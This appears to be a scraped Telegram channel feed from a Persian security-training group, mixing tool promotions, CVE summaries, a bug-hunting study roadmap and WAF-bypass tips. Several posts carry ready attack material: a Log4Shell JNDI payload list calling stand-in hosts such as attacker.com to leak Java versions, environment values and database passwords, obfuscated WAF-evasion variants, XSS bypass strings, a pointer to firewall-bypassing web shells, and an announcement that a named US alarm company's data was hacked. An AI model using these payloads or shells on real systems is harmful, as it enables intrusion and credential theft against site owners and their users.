KASRAONE
1.03K subscribers
135 photos
6 videos
14 files
252 links
...................﷽........................
🐞باگ‌ها را شکار کنیم، کد را بهتر کنیم👨‍💻
برگزاری دوره‌های برنامه نویسی و امنیت
سایبری

آدرس سایت 🌐
kasraone.ir
تلفن☎️:
۰۵۱۴-۳۲۲۴۱۶۸
آیدی پشتیبان
🆔️ : @academykasraone

آدرس گروه کسری وان

🌐 : @kasraonegap
Download Telegram
🔴 ezXSS

Git Hub : 🐈


Easy to use dashboard with settings, statistics, payloads, view/share/search reports
🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
Unlimited users with permissions to personal payloads & their reports
Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
Custom javascript payloads
Custom payload links to distinguish insert points
Extract additional pages, block, whitelist and other filters
Secure your login with Two-factor (2FA)

The following information can be collected on a vulnerable page:

The URL of the page

IP Address
Any page referer (or share referer)


LINKTOOLS




        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
👍2
WebShells

Prvi8 PHP AND ASPX Web Shells ( Bypasser Web Shells ) firewall Bypass Shells (web shells)
Imunify360 ByPass ( 403.php )

Git Hub 🐈

https://github.com/sagsooz/Bypass-Webshell


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
🔴 Blind SSRF to Port Scanning through response time


LINK MEDIUM




        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
🔴 اطلاعات سازمان آمریکایی توست هکرها هک شد ! : American Alarm and

Communications
که در سال 1971 تاسیس شد و دفتر مرکزی آن در آرلینگتون، ماساچوست، مستقر است، American Alarm and Communications
یک شرکت ادغام و نظارت بر سیستم های امنیتی 24 ساعته است. در American Alarm ما به حفاظت محلی و قابل اعتماد اعتقاد داریم. ما از سال 1971 از خانه‌ها و مشاغل در سراسر نیوانگلند محافظت می‌کنیم. شرکت ما با متخصصان متعهد کار می‌کند که در جوامعی که به آنها خدمت می‌کنند زندگی می‌کنند - شاید حتی در همسایگی شما.

سایت: www.americanalarm.com

نشانی:
297 برادوی، آرلینگتون،
ماساچوست، 02474،
ایالات متحده





        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
😱2
🔴 CISA
دستورالعمل اضطراری را به آژانس های فدرال در مورد سوء استفاده های Ivanti Zero-Day صادر می کند



The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products.


The development arrives as the vulnerabilities – an authentication bypass (CVE-2023-46805) and a code injection bug (CVE-2024-21887) – have come under widespread exploitation by multiple threat actors. The flaws allow a malicious actor to craft malicious requests and execute arbitrary commands on the system.



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
3👍1
🔴 CVE

CVE-2023-48382

Softnext Mail SQR Expert

یک پلتفرم مدیریت ایمیل است که دارای یک آسیب‌پذیری Local File Inclusion (LFI) در URL مربوط به تحویل ایمیل است. یک مهاجم  ازراه دور تأیید نشده می‌تواند از این آسیب‌پذیری برای اجرای فایل PHP دلخواه با پسوند فایل .asp در مسیرهای خاص سیستم، برای دسترسی و اصلاح اطلاعات جزئی سیستم سوء استفاده کند، اما در دسترس بودن سرویس تأثیری ندارد.

LINK


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
🔴 Local File Inclusion

(LFI) — Web Application Penetration Testing


MEDIUM


LINK


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
بازی ایران و ژاپن

برد ایران را به تمامی ایرانی های عزیز
کشورمان تبریک میگوییم

2🇮🇷 🇯🇵1
8👍1
🔴 CVE

CVE-2024-0728

LFI

A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
👍2
🔴CVE

CVE-2024-22859

آسیب‌پذیری Cross-Site Request Forgery (CSRF) در livewire قبل از نسخه 3.0.4، به مهاجمان راه دور اجازه می‌دهد تا تابع getCsrfToken کد دلخواه را اجرا کنند. توجه: فروشنده با این موضوع مخالفت می کند زیرا commit 5d88731 یک مشکل قابلیت استفاده (کدهای وضعیت HTTP 419 برای فعالیت مشتری قانونی) را برطرف می کند، نه یک مشکل امنیتی.




        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
🔴 Log4Shell


CVE-2021-44228 Log4Shell



🔴 Apache Log4j2 <=2.14.1


Payloads

Java
# Identify Java version and hostname
${jndi:ldap://${java:version}.domain/a}
${jndi:ldap://${env:JAVA_VERSION}.domain/a}
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${sys:java.vendor}.domain/a}
${jndi:ldap://${hostName}.domain/a}
${jndi:dns://${hostName}.domain}

# More enumerations keywords and variables
java:os
docker:containerId
web:rootDir
bundle:config:db.password



🔴WAF Bypass


${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}

# using lower and upper
${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}

# using env to create the letter
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
🔴 MEDIUM


Web Application Firewall (WAF) Evasion Techniques


🔴 LINK


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
1
بایپس باگ XSS

<A
HREF="http://66.102.7.147/">XSS</A>0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"veris-->group<svg/onload=alert(/XSS/)//#"><img src=M onerror=alert('XSS');>



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
🔥2
Git Hub 🐈

Tools bypass

Gema

Neam :
FabricBlockedServersBypass

Link


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
1
🔴 XSS

Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,topk%2B%27lert%27>

        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
🔴Ethical-hacking-Roadmap & bug hunting RoadmapKasraone


Computer Fundamentals

https://www.comptia.org/training/by-certification/a
https://www.youtube.com/watch?v=tIfRDPekybU
https://www.tutorialspoint.com/computer_fundamentals/index.htm
https://onlinecourses.swayam2.ac.in/cec19_cs06/preview
https://www.udemy.com/course/complete-computer-basics-course/
https://www.coursera.org/courses?query=computer%20fundamentals

Computer Networking

https://www.youtube.com/watch?v=0AcpUwnc12E&list=PLkW9FMxqUvyZaSQNQslneeODER3bJCb2K
https://www.youtube.com/watch?v=qiQR5rTSshw -https://www.youtube.com/watch?v=L3ZzkOTDins
https://www.udacity.com/course/computer-networking--ud436
https://www.coursera.org/professional-certificates/google-it-support
https://www.udemy.com/course/introduction-to-computer-networks/
NetworkChuck: https://www.youtube.com/c/NetworkChuck

Operating Systems

https://www.youtube.com/watch?v=z2r-p7xc7c4
https://www.youtube.com/watch?v=_tCY-c-sPZc
https://www.coursera.org/learn/os-power-user
https://www.udacity.com/course/introduction-to-operating-systems--ud923
https://www.udemy.com/course/linux-command-line-volume1/
https://www.youtube.com/watch?v=v_1zB2WNN14

Command Line

Windows:
https://www.youtube.com/watch?v=TBBbQKp9cKw&list=PLRu7mEBdW7fDTarQ0F2k2tpwCJg_hKhJQ
https://www.youtube.com/watch?v=fid6nfvCz1I&list=PLRu7mEBdW7fDlf80vMmEJ4Vw9uf2Gbyc_
https://www.youtube.com/watch?v=UVUd9_k9C6A

Linux:

https://www.youtube.com/watch?v=fid6nfvCz1I&list=PLRu7mEBdW7fDlf80vMmEJ4Vw9uf2Gbyc_
https://www.youtube.com/watch?v=UVUd9_k9C6A -
https://www.youtube.com/watch?v=GtovwKDemnI
https://www.youtube.com/watch?v=2PGnYjbYuUo
https://www.youtube.com/watch?v=e7BufAVwDiM&t=418s
https://www.youtube.com/watch?v=bYRfRGbqDIw&list=PLkPmSWtWNIyTQ1NX6MarpjHPkLUs3u1wG&index=4

Programming

C
https://www.youtube.com/watch?v=irqbmMNs2Bo
https://www.youtube.com/watch?v=ZSPZob_1TOk
https://www.programiz.com/c-programming
Python
https://www.youtube.com/watch?v=ZLga4doUdjY&t=30352s
https://www.youtube.com/watch?v=gfDE2a7MKjA
https://www.youtube.com/watch?v=eTyI-M50Hu4
JavaScript
https://www.youtube.com/watch?v=-lCF2t6iuUc
https://www.youtube.com/watch?v=hKB-YGF14SY&t=1486s
https://www.youtube.com/watch?v=jS4aFq5-91M
PHP
https://www.youtube.com/watch?v=1SnPKhCdlsU
https://www.youtube.com/watch?v=OK_JCtrrv-c
https://www.youtube.com/watch?v=T8SEGXzdbYg&t=1329s

Where to learn from?

Books

Web Application Hacker's Handbook: https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470
Real World Bug Hunting: https://www.amazon.in/Real-World-Bug-Hunting-Field-Hacking-ebook/dp/B072SQZ2LG
Bug Bounty Hunting Essentials: https://www.amazon.in/Bug-Bounty-Hunting-Essentials-Quick-paced-ebook/dp/B079RM344H
Bug Bounty Bootcamp: https://www.amazon.in/Bug-Bounty-Bootcamp-Reporting-Vulnerabilities-ebook/dp/B08YK368Y3
Hands on Bug Hunting: https://www.amazon.in/Hands-Bug-Hunting-Penetration-Testers-ebook/dp/B07DTF2VL6
Hacker's Playbook 3: https://www.amazon.in/Hacker-Playbook-Practical-Penetration-Testing/dp/1980901759
OWASP Testing Guide: https://www.owasp.org/index.php/OWASP_Testing_Project
Web Hacking 101: https://www.pdfdrive.com/web-hacking-101-e26570613.html
OWASP Mobile Testing Guide :https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide

Writeups

Medium: https://medium.com/analytics-vidhya/a-beginners-guide-to-cyber-security-3d0f7891c93a
Infosec Writeups: https://infosecwriteups.com/?gi=3149891cc73d
Hackerone Hacktivity: https://hackerone.com/hacktivity
Google VRP Writeups: https://github.com/xdavidhu/awesome-google-vrp-writeups

Blogs and Articles

Hacking Articles: https://www.hackingarticles.in/
Vickie Li Blogs: https://vickieli.dev/
Bugcrowd Blogs: https://www.bugcrowd.com/blog/



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
4👍1
🔴دور زدن WAF وب سایت

خوب سلام درود
به تمامی کاربران عزیز کسری وان امیدوارم حالتون عالی باشه این بار میخواهیم درباره دورزدن WAF وب سایت صحبت کنیم

حمایت یادتون نره

برای دور زدن WAF (Web Application Firewall) یک وب سایت، باید اقدامات امنیتی خاصی را انجام دهید. البته توجه داشته باشید که دور زدن WAF یک فعالیت غیرقانونی است و ممکن است منجر به پیامدهای قانونی شدیدی شود. در اینجا توضیحاتی برای اهداف آموزشی ارائه می‌شود:

1. استفاده از تکنیک‌های مخرب: برخی حملات مانند حملات از نوع SQL Injection، Cross-Site Scripting (XSS)، و Command Injection می‌توانند به شما کمک کنند تا WAF را دور بزنید. با این حال، توجه داشته باشید که انجام این حملات تخلف قانونی است.

2. استفاده از تغییر IP: اگر IP شما در لیست سیاه WAF قرار گرفته است، می‌توانید از VPN یا پروکسی استفاده کنید تا آدرس IP خود را تغییر دهید و به وب سایت دسترسی پیدا کنید.

3. استفاده از پروکسی‌های متحرک: برخی پروکسی‌ها و تکنولوژی‌های مشابه می‌توانند به شما کمک کنند تا WAF را دور بزنید.

4. شناسایی ضعف‌های WAF: با بررسی نحوه عملکرد WAF و شناسایی ضعف‌های آن، ممکن است بتوانید روش‌های دور زدن را پیدا کنید.



5استفاده از سینتکس JSON در payload‌های تزریقی SQL می‌تواند به شما کمک کند تا WAF را دور بزنید. زیرا بسیاری از WAF‌ها برای تشخیص حملات SQLi به دنبال الگوهای خاصی می‌گردند که در payload‌های SQLi وجود دارد. با اضافه کردن سینتکس JSON به payload، ممکن است WAF نتواند به درستی تشخیص حمله را انجام دهد و اجازه ورود payload به سیستم را بدهد.


توجه داشته باشید که دور زدن WAF یک عمل غیرقانونی است و ممکن است به شما مشکلات قانونی و امنیتی جدی وارد کند. بهترین راه برای حفظ امنیت وب سایت خود، استفاده از روش‌های امنیتی قوی و همچنین همکاری با تیم امنیت اطلاعات خود است.



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
3👍21
دوستان به دلیل اینکه کاربران خارجی پیام دادند
که پست ها به زبان انگلیسی بزاریم به نظره شما
اینطور باشد
نظره خود را با ما در میان بگذارید ممنون
👍61
پست جدید حمایت یادتون نره ممنون


https://vrgl.ir/PHnLd

        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2👍1🎉1
🔴 CVE

CVE-2024-1750


یک آسیب پذیری که به عنوان بحرانی طبقه بندی شده بود، در TemmokuMVC تا 2.3 یافت شد.

تابع get_img_url/img_replace


در کتابخانه lib/images_get_down.php کامپوننت Image Download Handler تحت تأثیر قرار گرفته است. دستکاری منجر به سریال زدایی می شود. امکان انجام حمله از راه دور وجود دارد. پیچیدگی یک حمله نسبتاً زیاد است. گفته می شود که قابلیت بهره برداری دشوار است. این سوء استفاده برای عموم فاش شده است و ممکن است مورد استفاده قرار گیرد. شناسه این آسیب پذیری VDB-254532 است.

توجه: با فروشنده در مورد این افشای اولیه تماس گرفته شد اما به هیچ وجه پاسخ نداد.

این آسیب پذیری قابل بهره برداری از راه دور است و پیچیدگی حمله نسبتاً زیاد است

        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
11
ActiveScan++

ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers:

Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding)

Edge Side Includes

XML input handling

Suspicious input transformation (eg 7*7 => '49', \\ => '\' )

Passive-scanner issues that only occur during fuzzing (install the 'Error Message Checks' extension for maximum effectiveness)


ActiveScan++

قابلیت های اسکن فعال و غیرفعال Burp Suite را گسترش می دهد. این برنامه برای اضافه کردن حداقل هزینه های شبکه طراحی شده است و رفتار برنامه ای را که ممکن است برای تست کنندگان پیشرفته جالب باشد ، شناسایی می کند:

حملات هدر میزبان بالقوه (مسمومیت با تنظیم مجدد رمز عبور ، مسمومیت با حافظه پنهان، پیوند مجدد DNS)
لبه سمت شامل
مدیریت ورودی XML
تبدیل ورودی مشکوک (به عنوان مثال 7*7 => '49', \\ => '\' )
مشکلات اسکنر غیرفعال که فقط در طول فازینگ رخ می دهد (برای حداکثر اثربخشی ، افزونه "بررسی پیام خطا" را نصب کنید)

LINK TOOLS


         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone
👍8🎉7👏64🔥4🥰32